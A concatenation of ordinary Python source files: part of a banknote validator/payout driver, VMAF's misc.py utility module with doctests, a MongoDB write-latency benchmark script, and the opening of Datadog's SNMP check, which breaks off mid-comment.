# validator ( 0.5, 0.5, 0.5, etc. )
self.actions_args['{}_currency'.format(
prefix)] = currency.upper().encode()
def set_route_cashbox(self, amount, currency="CHF"):
"""Will set the route of <amount> in the cashbox
NV11: Will set the route of <= amount in the cashbox"""
self.__action_helper(
amount,
currency,
Actions.ROUTE_TO_CASHBOX,
"routec")
def set_route_storage(self, amount, currency="CHF"):
"""Set the bills <amount> in the storage
NV11: Set the bills <= amount in the storage"""
self.__action_helper(amount, currency, Actions.ROUTE_TO_STORAGE, "routes")
def payout(self, amount, currency="CHF"):
"""Payout note(s) for completing the amount passed in parameter"""
self.__action_helper(amount, currency, Actions.PAYOUT, "payout")
def get_note_amount(self, amount, currency="CHF"):
"""Get the numbers of note of value X in the smart payout device"""
self.__action_helper(
amount,
currency,
Actions.GET_NOTE_AMOUNT,
"getnoteamount")
def reset(self):
self.print_debug("Starting reset")
self.essp.ssp6_reset(self.sspC)
self.print_debug("Reset complet")
def nv11_payout_next_note(self):
self.actions.put(Actions.PAYOUT_NEXT_NOTE_NV11)
def nv11_stack_next_note(self):
self.actions.put(Actions.STACK_NEXT_NOTE_NV11)
def empty_storage(self):
self.actions.put(Actions.EMPTY_STORAGE)
def disable_payout(self):
self.actions.put(Actions.DISABLE_PAYOUT)
def disable_validator(self):
self.actions.put(Actions.DISABLE_VALIDATOR)
|
misc.py | import subprocess
import unittest
from fnmatch import fnmatch
import multiprocessing
from time import sleep, time
import itertools
from pathlib import Path
import numpy as np
import sys
import errno
import os
from vmaf import run_process
from vmaf.tools.scanf import sscanf, IncompleteCaptureError, FormatError
__copyright__ = "Copyright 2016-2020, Netflix, Inc."
__license__ = "BSD+Patent"
try:
unicode # noqa, remove this once python2 support is dropped
except NameError:
unicode = str
try:
multiprocessing.set_start_method('fork')
except ValueError: # noqa, If platform does not support, just ignore
pass
def get_stdout_logger():
import logging
logger = logging.getLogger()
handler = logging.StreamHandler(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
return logger
def close_logger(logger):
for handler in logger.handlers:
handler.close()
logger.removeHandler(handler)
def get_file_name_without_extension(path):
"""
>>> get_file_name_without_extension('yuv/src01_hrc01.yuv')
'src01_hrc01'
>>> get_file_name_without_extension('yuv/src01_hrc01')
'src01_hrc01'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.yuv')
'src01_hrc01'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.sdr.yuv')
'src01_hrc01.sdr'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.sdr.dvi.yuv')
'src01_hrc01.sdr.dvi'
"""
return Path(path).stem
def get_file_name_with_extension(path):
"""
>>> get_file_name_with_extension('yuv/src01_hrc01.yuv')
'src01_hrc01.yuv'
>>> get_file_name_with_extension('src01_hrc01.yuv')
'src01_hrc01.yuv'
>>> get_file_name_with_extension('abc/xyz/src01_hrc01.yuv')
'src01_hrc01.yuv'
"""
return Path(path).name
def get_file_name_extension(path):
'''
>>> get_file_name_extension("file:///mnt/zli/test.txt")
'txt'
>>> get_file_name_extension("test.txt")
'txt'
>>> get_file_name_extension("abc")
''
>>> get_file_name_extension("test.265")
'265'
'''
return Path(path).suffix[1:]
def get_normalized_path(dir_):
"""
>>> get_normalized_path('abc/xyz/')
'abc/xyz'
>>> get_normalized_path('abc/xyz')
'abc/xyz'
>>> get_normalized_path('abc/xyz.txt')
'abc/xyz.txt'
"""
if dir_[-1] == '/':
return dir_[:-1]
else:
return dir_
def get_dir_without_last_slash(path):
"""
>>> get_dir_without_last_slash('abc/src01_hrc01.yuv')
'abc'
>>> get_dir_without_last_slash('src01_hrc01.yuv')
''
>>> get_dir_without_last_slash('abc/xyz/src01_hrc01.yuv')
'abc/xyz'
>>> get_dir_without_last_slash('abc/xyz/')
'abc/xyz'
"""
return "/".join(path.split("/")[:-1])
def make_parent_dirs_if_nonexist(path):
dst_dir = get_dir_without_last_slash(path)
os.makedirs(dst_dir, exist_ok=True)
def delete_dir_if_exists(dir):
if os.path.isdir(dir):
os.rmdir(dir)
def get_normalized_string_from_dict(d):
""" Normalized string representation with sorted keys.
>>> get_normalized_string_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
'bitrate_kbps_45_max_buffer_sec_5.0'
"""
return '_'.join(map(lambda k: '{k}_{v}'.format(k=k,v=d[k]), sorted(d.keys())))
def get_hashable_value_tuple_from_dict(d):
""" Hashable tuple of values with sorted keys.
>>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
(45, 5.0)
>>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, "resolutions": [(740, 480), (1920, 1080), ]})
(45, 5.0, ((740, 480), (1920, 1080)))
"""
return tuple(map(
lambda k: tuple(d[k]) if isinstance(d[k], list) else d[k],
sorted(d.keys())))
def get_unique_str_from_recursive_dict(d):
""" String representation with sorted keys and values for recursive dict.
>>> get_unique_str_from_recursive_dict({'a':1, 'b':2, 'c':{'x':'0', 'y':'1'}})
'{"a": 1, "b": 2, "c": {"x": "0", "y": "1"}}'
>>> get_unique_str_from_recursive_dict({'a':1, 'c':2, 'b':{'y':'1', 'x':'0', }})
'{"a": 1, "b": {"x": "0", "y": "1"}, "c": 2}'
"""
from collections import OrderedDict
import json
def to_ordered_dict_recursively(d):
if isinstance(d, dict):
return OrderedDict(map(
lambda t: (to_ordered_dict_recursively(t[0]), to_ordered_dict_recursively(t[1])),
sorted(d.items())
))
else:
return d
return json.dumps(to_ordered_dict_recursively(d))
def indices(a, func):
"""
Get indices of elements in an array which satisfies func
>>> indices([1, 2, 3, 4], lambda x: x>2)
[2, 3]
>>> indices([1, 2, 3, 4], lambda x: x==2.5)
[]
>>> indices([1, 2, 3, 4], lambda x: x>1 and x<=3)
[1, 2]
>>> indices([1, 2, 3, 4], lambda x: x in [2, 4])
[1, 3]
>>> indices([1,2,3,1,2,3,1,2,3], lambda x: x > 2)
[2, 5, 8]
"""
return [i for (i, val) in enumerate(a) if func(val)]
def import_python_file(filepath):
"""
Import a python file as a module.
:param filepath:
:return:
"""
filename = get_file_name_without_extension(filepath)
try:
from importlib.machinery import SourceFileLoader
ret = SourceFileLoader(filename, filepath).load_module()
except ImportError:
import imp
ret = imp.load_source(filename, filepath)
return ret
def make_absolute_path(path, current_dir):
'''
>>> make_absolute_path('abc/cde.fg', '/xyz/')
'/xyz/abc/cde.fg'
>>> make_absolute_path('/abc/cde.fg', '/xyz/')
'/abc/cde.fg'
'''
if path[0] == '/':
return path
else:
return current_dir + path
def empty_object():
return type('', (), {})()
def get_cmd_option(argv, begin, end, option):
'''
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 3, 5, '--xyz')
'123'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, '--xyz')
'123'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 4, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 5, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 6, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'a')
'b'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'b')
'c'
'''
itr = None
for itr in range(begin, end):
if argv[itr] == option:
break
if itr is not None and itr != end and (itr + 1) != end:
return argv[itr + 1]
return None
def cmd_option_exists(argv, begin, end, option):
'''
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'c')
True
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'c')
False
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'd')
True
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'a')
False
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'b')
False
'''
found = False
for itr in range(begin, end):
if argv[itr] == option:
found = True
break
return found
def index_and_value_of_min(l):
'''
>>> index_and_value_of_min([2, 0, 3])
(1, 0)
'''
return min(enumerate(l), key=lambda x: x[1])
def parallel_map(func, list_args, processes=None):
"""
Build my own parallelized map function since multiprocessing's Process(),
or Pool.map() cannot meet my both needs:
1) be able to control the maximum number of processes in parallel
2) be able to take in non-picklable objects as arguments
"""
# get maximum number of active processes that can be used
max_active_procs = processes if processes is not None else multiprocessing.cpu_count()
# create shared dictionary
return_dict = multiprocessing.Manager().dict()
# define runner function
def func_wrapper(idx_args):
idx, args = idx_args
executor = func(args)
return_dict[idx] = executor
# add idx to args
list_idx_args = []
for idx, args in enumerate(list_args):
list_idx_args.append((idx, args))
procs = []
for idx_args in list_idx_args:
proc = multiprocessing.Process(target=func_wrapper, args=(idx_args,))
procs.append(proc)
waiting_procs = set(procs)
active_procs = set([])
# processing
while True:
# check if any procs in active_procs is done; if yes, remove them
for p in active_procs.copy():
if not p.is_alive():
active_procs.remove(p)
# check if can add a proc to active_procs (add gradually one per loop)
if len(active_procs) < max_active_procs and len(waiting_procs) > 0:
# move one proc from waiting_procs to active_procs
p = waiting_procs.pop()
active_procs.add(p)
p.start()
# if both waiting_procs and active_procs are empty, can terminate
if len(waiting_procs) == 0 and len(active_procs) == 0:
break
sleep(0.01) # check every x sec
# finally, collect results
rets = list(map(lambda idx: return_dict[idx], range(len(list_args))))
return rets
def check_program_exist(program):
'''
>>> check_program_exist("xxxafasd34df")
False
>>> check_program_exist("xxxafasd34df f899")
False
>>> check_program_exist("ls")
True
>>> check_program_exist("ls -all")
True
>>> check_program_exist("pwd")
True
'''
try:
subprocess.call(program.split(), stdout=open(os.devnull, 'wb'))
return True
except OSError as e:
if e.errno == errno.ENOENT:
return False
else:
# Something else went wrong while trying to run `wget`
raise
def check_scanf_match(string, template):
'''
>>> check_scanf_match('frame00000000.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame00000003.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame0000001.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame00000001.icpff', 'frame%08d.icpf')
True
>>> check_scanf_match('gframe00000001.icpff', 'frame%08d.icpf')
False
>>> check_scanf_match('fyrame00000001.icpff', 'frame%08d.icpf')
False
>>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy/frame%08d.icpf')
True
>>> check_scanf_match('xx/yy//frame00000000.icpf', 'xx/yy/frame%08d.icpf')
False
>>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy//frame%08d.icpf')
False
>>> check_scanf_match("-1-2+3-4", "%02d%02d%02d%02d")
True
>>> check_scanf_match('frame00000240.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_30.yuv.avi', '/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_*.yuv.avi')
True
'''
ret = False
try:
sscanf(string, template)
return True
except (FormatError, IncompleteCaptureError):
pass
if fnmatch(string, template):
return True
return False
def match_any_files(template):
dir_ = os.path.dirname(template)
for filename in os.listdir(dir_):
filepath = dir_ + '/' + filename
if check_scanf_match(filepath, template):
return True
return False
def unroll_dict_of_lists(dict_of_lists):
""" Unfold a dictionary of lists into a list of dictionaries.
>>> dict_of_lists = {'norm_type':['normalize'], 'n_estimators':[10, 50], 'random_state': [0]}
>>> expected = [{'n_estimators': 10, 'norm_type': 'normalize', 'random_state': 0}, {'n_estimators': 50, 'norm_type': 'normalize', 'random_state': 0}]
>>> unroll_dict_of_lists(dict_of_lists) == expected
True
"""
keys = sorted(dict_of_lists.keys()) # normalize order
list_of_key_value_pairs = []
for key in keys:
values = dict_of_lists[key]
key_value_pairs = []
for value in values:
key_value_pairs.append((key, value))
list_of_key_value_pairs.append(key_value_pairs)
list_of_key_value_pairs_rearranged = \
itertools.product(*list_of_key_value_pairs)
list_of_dicts = []
for key_value_pairs in list_of_key_value_pairs_rearranged:
list_of_dicts.append(dict(key_value_pairs))
return list_of_dicts
def neg_if_even(x):
"""
>>> neg_if_even(2)
-1
>>> neg_if_even(1)
1
>>> neg_if_even(0)
-1
>>> neg_if_even(-1)
1
>>> neg_if_even(-2)
-1
"""
return 1 - (x % 2 == 0) * 2
def get_unique_sorted_list(l):
"""
>>> get_unique_sorted_list([3, 4, 4, 1])
[1, 3, 4]
>>> get_unique_sorted_list([])
[]
"""
return sorted(list(set(l)))
class Timer(object):
def __enter__(self):
self.tstart = time()
def __exit__(self, type, value, traceback):
print('Elapsed: %s sec' % (time() - self.tstart))
def dedup_value_in_dict(d):
"""
>>> dedup_value_in_dict({'a': 1, 'b': 1, 'c': 2}) == {'a': 1, 'c': 2}
True
"""
reversed_d = dict()
keys = sorted(d.keys())
for key in keys:
value = d[key]
if value not in reversed_d:
reversed_d[value] = key
d_ = dict()
for value, key in reversed_d.items():
d_[key] = value
return d_
class MyTestCase(unittest.TestCase):
def setUp(self):
self.verificationErrors = []
self.maxDiff = None
def tearDown(self):
self.assertEqual([], self.verificationErrors)
def assertAlmostEqual(self, first, second, places=None, msg=None, delta=None):
try:
super().assertAlmostEqual(first, second, places, msg, delta)
except AssertionError as e:
self.verificationErrors.append(str(e))
class QualityRunnerTestMixin(object):
def run_each(self, score, runner_class, asset, optional_dict):
runner = runner_class(
[asset],
None,
fifo_mode=False,
delete_workdir=True,
result_store=None,
optional_dict=optional_dict,
)
runner.run(parallelize=False)
results = runner.results
self.assertAlmostEqual(results[0][runner_class.get_score_key()], score, places=5)
def find_linear_function_parameters(p1, p2):
"""
Find parameters of a linear function connecting first_point and second_point
>>> find_linear_function_parameters((1, 1), (0, 0))
Traceback (most recent call last):
...
AssertionError: first_point coordinates need to be smaller or equal to second_point coordinates
>>> find_linear_function_parameters((0, 1), (0, 0))
Traceback (most recent call last):
...
AssertionError: first_point coordinates need to be smaller or equal to second_point coordinates
>>> find_linear_function_parameters((1, 0), (0, 0))
Traceback (most recent call last):
...
AssertionError: first_point coordinates need to be smaller or equal to second_point coordinates
>>> find_linear_function_parameters((50.0, 30.0), (50.0, 100.0))
Traceback (most recent call last):
...
AssertionError: first_point and second_point cannot lie on a horizontal or vertical line
>>> find_linear_function_parameters((50.0, 30.0), (100.0, 30.0))
Traceback (most recent call last):
...
AssertionError: first_point and second_point cannot lie on a horizontal or vertical line
>>> find_linear_function_parameters((50.0, 20.0), (110.0, 110.0))
(1.5, -55.0)
>>> a, b = find_linear_function_parameters((50.0, 30.0), (110.0, 110.0))
>>> np.testing.assert_almost_equal(a, 1.333333333333333)
>>> np.testing.assert_almost_equal(b, -36.666666666666664)
>>> find_linear_function_parameters((50.0, 30.0), (50.0, 30.0))
(1, 0)
"""
assert len(p1) == 2, 'first_point needs to have exactly 2 coordinates'
assert len(p2) == 2, 'second_point needs to have exactly 2 coordinates'
assert p1[0] <= p2[0] and p1[1] <= p2[1], \
'first_point coordinates need to be smaller or equal to second_point coordinates'
if p2[0] - p1[0] == 0 or p2[1] - p1[1] == 0:
assert p1 == p2, 'first_point and second_point cannot lie on a horizontal or vertical line'
alpha = 1 # both points are the same
beta = 0
elif p1[0] == 0:
beta = p1[1]
alpha = (p2[1] - beta) / p2[0]
else:
beta = (p2[1] * (p1[1] - p1[0])) / (p2[0] - p1[0])
alpha = (p1[1] - beta) / p1[0]
return alpha, beta
def piecewise_linear_mapping(x, knots):
"""
A piecewise linear mapping function, defined by the boundary points of each segment. For example,
a function consisting of 3 segments is defined by 4 points. The x-coordinate of each point need to be
greater that the x-coordinate of the previous point, the y-coordinate needs to be greater or equal.
The function continues with the same slope for the values below the first point and above the last point.
INPUT:
x_in - np.array of values to be mapped
knots - list of (at least 2) lists with x and y coordinates [[x0, y0], [x1, y1], ...]
>>> x = np.arange(0.0, 110.0)
>>> piecewise_linear_mapping(x, [[0, 1], [1, 2], [1, 3]])
Traceback (most recent call last):
...
AssertionError: The x-coordinate of each point need to be greater that the x-coordinate of the previous point, the y-coordinate needs to be greater or equal.
>>> piecewise_linear_mapping(x, [[0, 0], []])
Traceback (most recent call last):
...
AssertionError: Each point needs to have two coordinates [x, y]
>>> piecewise_linear_mapping(x, [0, 0])
Traceback (most recent call last):
...
AssertionError: knots needs to be list of lists
>>> piecewise_linear_mapping(x, [[0, 2], [1, 1]])
Traceback (most recent call last):
...
AssertionError: The x-coordinate of each point need to be greater that the x-coordinate of the previous point, the y-coordinate needs to be greater or equal.
>>> knots2160p = [[0.0, -55.0], [95.0, 87.5], [105.0, 105.0], [110.0, 110.0]]
>>> knots1080p = [[0.0, -36.66], [90.0, 83.04], [95.0, 95.0], [100.0, 100.0]]
>>> x0 = np.arange(0.0, 95.0, 0.1)
>>> y0_true = 1.5 * x0 - 55.0
>>> y0 = piecewise_linear_mapping(x0, knots2160p)
>>> np.sqrt(np.mean((y0 - y0_true)**2))
0.0
>>> x1 = np.arange(0.0, 90.0, 0.1)
>>> y1_true = 1.33 * x1 - 36.66
>>> y1 = piecewise_linear_mapping(x1, knots1080p)
>>> np.sqrt(np.mean((y1 - y1_true) ** 2))
0.0
>>> x0 = np.arange(95.0, 105.0, 0.1)
>>> y0_true = 1.75 * x0 - 78.75
>>> y0 = piecewise_linear_mapping(x0, knots2160p)
>>> np.sqrt(np.mean((y0 - y0_true) ** 2))
0.0
>>> x1 = np.arange(90.0, 95.0, 0.1)
>>> y1_true = 2.392 * x1 - 132.24
>>> y1 = piecewise_linear_mapping(x1, knots1080p)
>>> np.testing.assert_almost_equal(np.sqrt(np.mean((y1 - y1_true) ** 2)), 0.0)
>>> x0 = np.arange(105.0, 110.0, 0.1)
>>> y0 = piecewise_linear_mapping(x0, knots2160p)
>>> np.sqrt(np.mean((y0 - x0) ** 2))
0.0
>>> x1 = np.arange(95.0, 100.0, 0.1)
>>> y1 = piecewise_linear_mapping(x1, knots1080p)
>>> np.sqrt(np.mean((y1 - x1) ** 2))
0.0
"""
assert len(knots) > 1
n_seg = len(knots) - 1
y = np.zeros(np.shape(x))
# construct the function
for idx in range(n_seg):
assert isinstance(knots[idx], list) and isinstance(knots[idx + 1], list), \
'knots needs to be list of lists'
assert len(knots[idx]) == len(knots[idx + 1]) == 2, \
'Each point needs to have two coordinates [x, y]'
assert knots[idx][0] < knots[idx + 1][0] and \
knots[idx][1] <= knots[idx + 1][1], \
'The x-coordinate of each point need to be greater that the x-coordinate of the previous point, ' \
'the y-coordinate needs to be greater or equal.'
cond0 = knots[idx][0] <= x
cond1 = x <= knots[idx + 1][0]
if knots[idx][1] == knots[idx + 1][1]: # the segment is horizontal
y[cond0 & cond1] = knots[idx][1]
if idx == 0:
# for points below the defined range
y[x < knots[idx][0]] = knots[idx][1]
elif idx == n_seg - 1:
# for points above the defined range
y[x > knots[idx + 1][0]] = knots[idx][1]
else:
slope, offset = find_linear_function_parameters(tuple(knots[idx]),
tuple(knots[idx + 1]))
y[cond0 & cond1] = slope * x[cond0 & cond1] + offset
if idx == 0:
# for points below the defined range
y[x < knots[idx][0]] = slope * x[x < knots[idx][0]] + offset
elif idx == n_seg - 1:
# for points above the defined range
y[x > knots[idx + 1][0]] = slope * x[x > knots[idx + 1][0]] + offset
return y
if __name__ == '__main__':
import doctest
doctest.testmod()
|
measure.py | import pymongo
import time
import threading
import argparse
MYDB = "mydatabase"
TABLENAME = "zookeeper"
STRONG = "[STRONG]"
WEAK = "[WEAK]"
strongDict = {"node": "/1", "value": "strong"}
weakDict = {"node": "/2", "value": "weak"}
CLINUM = 6
hostname = "mongodb://localhost:27017/"
stop_event = threading.Event()
def print_table(printDB):
print("==========")
for x in printDB.find():
print(x)
print("==========")
def updateAndGetTime(op, insertDB, insertDict, threadIdx, timeout_, warm_):
count = 0
totalTime = 0
timeout = time.time() + timeout_ + warm_
timeout_warm = time.time() + warm_
done_warm = False
while(True):
count += 1
start = time.time()
insertDB.update_one(insertDict, {"$set": {"value": count}})
end = time.time()
totalTime += (end - start)
if not done_warm and time.time() > timeout_warm:
# print("{:8s}- {}: count: {}, avg_time: {}ms, total time:{}ms =====Warm===== ".format(op, threadIdx, count, totalTime*1000/count, totalTime*1000))
print("{:8s}\t{}\tcount\t{}\tavg_time\t{:.5f} ms\ttotal_time\t{:.5f} ms\tWarm ".format(op, threadIdx, count, totalTime*1000/count, totalTime*1000))
count = 0
totalTime = 0
done_warm = True
if time.time() > timeout:
print("{:8s}\t{}\tcount\t{}\tavg_time\t{:.5f} ms\ttotal_time\t{:.5f} ms\tFinal ".format(op, threadIdx, count, totalTime*1000/count, totalTime*1000))
# print("{:8s}- {}: count: {}, avg_time: {}ms, total time:{}ms =====Final===== ".format(op, threadIdx, count, totalTime*1000/count, totalTime*1000))
break
def threadFunction(args):
op, threadIdx, opt = args
if op == STRONG:
updateAndGetTime(STRONG, strongCol, {"node": "/1"}, threadIdx, opt.time, opt.warm_time)
elif op == WEAK:
updateAndGetTime(WEAK, weakCol, {"node": "/2"}, threadIdx, opt.time, opt.warm_time)
if __name__ == '__main__':
# argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument("--host", help="host ip")
parser.add_argument("--mode", type=str, default="strong", help="strong weak mix")
parser.add_argument("--time", type=int, default=60, help="total sec for throughput")
parser.add_argument("--warm_time", type=int, default=30, help="time for warm up")
parser.add_argument("--w_mode", type=int, default=1, help="weak mode 1:(w=1, j=False) 2:(w=majority, j=False) 3:(w=1, j=True)")
opt = parser.parse_args()
if opt.host:
hostname = opt.host
opt.mode = opt.mode.lower()
if opt.mode == "strong" or opt.mode == "mix":
strongClient = pymongo.MongoClient(hostname, w="majority", j=True, maxPoolSize=20)
strongDB = strongClient[MYDB]
strongCol = strongDB[TABLENAME]
strongCol.insert_one(strongDict) # init with /1
if opt.mode == "weak" or opt.mode == "mix":
if opt.w_mode == 1:
print("using setting w=1 j=False")
weakClient = pymongo.MongoClient(hostname, w=1, j=False, maxPoolSize=20)
elif opt.w_mode == 2:
print("using setting w=majority j=False")
weakClient = pymongo.MongoClient(hostname, w="majority", j=False, maxPoolSize=20)
elif opt.w_mode == 3:
print("using setting w=1 j=True")
weakClient = pymongo.MongoClient(hostname, w=1, j=True, maxPoolSize=20)
weakDB = weakClient[MYDB]
weakCol = weakDB[TABLENAME]
weakCol.insert_one(weakDict) # init with /2
print("done creating client..")
threadList = []
for i in range(CLINUM):
if opt.mode == "strong":
x = threading.Thread(target=threadFunction, args=((STRONG, i, opt),))
# x = threading.Timer(interval=opt.time, function=threadFunction, args=((STRONG, i),))
threadList.append(x)
x.start()
elif opt.mode == "weak":
x = threading.Thread(target=threadFunction, args=((WEAK, i, opt),))
# x = threading.Timer(interval=opt.time, function=threadFunction, args=((WEAK, i),))
threadList.append(x)
x.start()
elif opt.mode == "mix":
if i % 2 == 0:
x = threading.Thread(target=threadFunction, args=((STRONG, i, opt),))
# x = threading.Timer(interval=opt.time, function=threadFunction, args=((STRONG, i),))
threadList.append(x)
x.start()
else:
x = threading.Thread(target=threadFunction, args=((WEAK, i, opt),))
# x = threading.Timer(interval=opt.time, function=threadFunction, args=((WEAK, i),))
threadList.append(x)
x.start()
for t in threadList:
t.join(opt.time)
# see result and delete data
client = pymongo.MongoClient(hostname)
col = client[MYDB]["zookeeper"]
print_table(col)
col.delete_many({"node": "/1"})
col.delete_many({"node": "/2"})
|
snmp.py | # (C) Datadog, Inc. 2010-2019
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import fnmatch
import ipaddress
import json
import os
import threading
import time
from collections import defaultdict
import pysnmp.proto.rfc1902 as snmp_type
import yaml
from pyasn1.codec.ber import decoder
from pysnmp import hlapi
from pysnmp.error import PySnmpError
from pysnmp.smi import builder
from pysnmp.smi.exval import noSuchInstance, noSuchObject
from six import iteritems
from datadog_checks.base import AgentCheck, ConfigurationError, is_affirmative
from datadog_checks.base.errors import CheckException
from .config import InstanceConfig
try:
from datadog_checks.base.utils.common import total_time_to_temporal_percent
except ImportError:
# Provide fallback for agent < 6.16
def total_time_to_temporal_percent(total_time, scale=1000):
return total_time / scale * 100
try:
from datadog_agent import get_config, read_persistent_cache, write_persistent_cache
except ImportError:
def get_config(value):
return ''
def write_persistent_cache(value, key):
pass
def read_persistent_cache(value):
return ''
# Additional types that are not part of the SNMP protocol. cf RFC 2856
CounterBasedGauge64, ZeroBasedCounter64 = builder.MibBuilder().importSymbols(
'HCNUM-TC', 'CounterBasedGauge64', 'ZeroBasedCounter64'
)
# Metric type that we support
SNMP_COUNTERS = frozenset([snmp_type.Counter32.__name__, snmp_type.Counter64.__name__, ZeroBasedCounter64.__name__])
SNMP_GAUGES = frozenset(
[
snmp_type.Gauge32.__name__,
snmp_type.Unsigned32.__name__,
CounterBasedGauge64.__name__,
snmp_type.Integer.__name__,
snmp_type.Integer32.__name__,
]
)
DEFAULT_OID_BATCH_SIZE = 10
def reply_invalid(oid):
return noSuchInstance.isSameTypeWith(oid) or noSuchObject.isSameTypeWith(oid)
class SnmpCheck(AgentCheck):
SC_STATUS = 'snmp.can_check'
_running = True
_thread = None
_NON_REPEATERS = 0
_MAX_REPETITIONS = 25
def __init__(self, name, init_config, instances):
super(SnmpCheck, self).__init__(name, init_config, instances)
# Set OID batch size
self.oid_batch_size = int(init_config.get('oid_batch_size', DEFAULT_OID_BATCH_SIZE))
# Load Custom MIB directory
self.mibs_path = init_config.get('mibs_folder')
self.ignore_nonincreasing_oid = is_affirmative(init_config.get('ignore_nonincreasing_oid', False))
self.profiles = init_config.get('profiles', {})
self.profiles_by_oid = {}
confd = get_config('confd_path')
for profile, profile_data in self.profiles.items():
filename = profile_data.get('definition_file')
if filename:
if not os.path.isabs(filename):
filename = os.path.join(confd, 'snmp.d', 'profiles', filename)
try:
with open(filename) as f:
data = yaml.safe_load(f)
except Exception:
raise ConfigurationError("Couldn't read profile '{}' in '{}'".format(profile, filename))
else:
data = profile_data['definition']
self.profiles[profile] = {'definition': data}
sys_object_oid = data.get('sysobjectid')
if sys_object_oid:
self.profiles_by_oid[sys_object_oid] = profile
self.instance['name'] = self._get_instance_key(self.instance)
self._config = self._build_config(self.instance)
def _build_config(self, instance):
return InstanceConfig(
instance,
self.warning,
self.log,
self.init_config.get('global_metrics', []),
self.mibs_path,
self.profiles,
self.profiles_by_oid,
)
def _get_instance_key(self, instance):
key = instance.get('name')
if key:
return key
ip = instance.get('ip_address')
port = instance.get('port')
if ip and port:
key = '{host}:{port}'.format(host=ip, port=port)
else:
key = ip
return key
def discover_instances(self):
config = self._config
discovery_interval = config.instance.get('discovery_interval', 3600)
while self._running:
start_time = time.time()
for host in config.ip_network.hosts():
host = str(host)
if host in config.discovered_instances:
continue
instance = config.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = self._build_config(instance)
try:
sys_object_oid = self.fetch_sysobject_oid(host_config)
except Exception as e:
self.log.debug("Error scanning host %s: %s", host, e)
continue
try:
profile = self._profile_for_sysobject_oid(sys_object_oid)
except ConfigurationError:
if not (host_config.table_oids or host_config.raw_oids):
self.log.warn("Host %s didn't match a profile for sysObjectID %s", host, sys_object_oid)
continue
else:
host_config.refresh_with_profile(self.profiles[profile], self.warning, self.log)
config.discovered_instances[host] = host_config
write_persistent_cache(self.check_id, json.dumps(list(config.discovered_instances)))
time_elapsed = time.time() - start_time
if discovery_interval - time_elapsed > 0:
time.sleep(discovery_interval - time_elapsed)
def raise_on_error_indication(self, error_indication, ip_address):
if error_indication:
message = '{} for instance {}'.format(error_indication, ip_address)
raise CheckException(message)
def check_table(self, config, table_oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name][row index] = value
In case of scalar objects, the row index is just 0
"""
results = defaultdict(dict)
enforce_constraints = config.enforce_constraints
oids = []
bulk_oids = []
# Use bulk for SNMP version > 1 and there are enough symbols
bulk_limit = config.bulk_threshold if config.auth_data.mpModel else 0
for table, symbols in table_oids.items():
if not symbols:
# No table to browse, just one symbol
oids.append(table)
elif len(symbols) < bulk_limit:
oids.extend(symbols)
else:
bulk_oids.append(table)
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=enforce_constraints)
for oid in bulk_oids:
try:
self.log.debug('Running SNMP command getBulk on OID %r', oid)
binds_iterator = config.call_cmd(
hlapi.bulkCmd,
self._NON_REPEATERS,
self._MAX_REPETITIONS,
oid,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False,
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
for result_oid, value in all_binds:
if not enforce_constraints:
# if enforce_constraints is false, then MIB resolution has not been done yet
# so we need to do it manually. We have to specify the mibs that we will need
# to resolve the name.
oid_to_resolve = hlapi.ObjectIdentity(result_oid.asTuple())
result_oid = oid_to_resolve.resolveWithMib(config.mib_view_controller)
_, metric, indexes = result_oid.getMibSymbol()
results[metric][indexes] = value
self.log.debug('Raw results: %s', results)
# Freeze the result
results.default_factory = None
return results, error
def check_raw(self, config, oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name] = value
In case of scalar objects, the row index is just 0
"""
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=False)
results = {}
for result_oid, value in all_binds:
oid = result_oid.asTuple()
matching = '.'.join(str(i) for i in oid)
results[matching] = value
self.log.debug('Raw results: %s', results)
return results, error
def fetch_oids(self, config, oids, enforce_constraints):
# UPDATE: We used to perform only a snmpgetnext command to fetch metric values.
# It returns the wrong value when the OID passeed is referring to a specific leaf.
# For example:
# snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.4.2.1.7.222
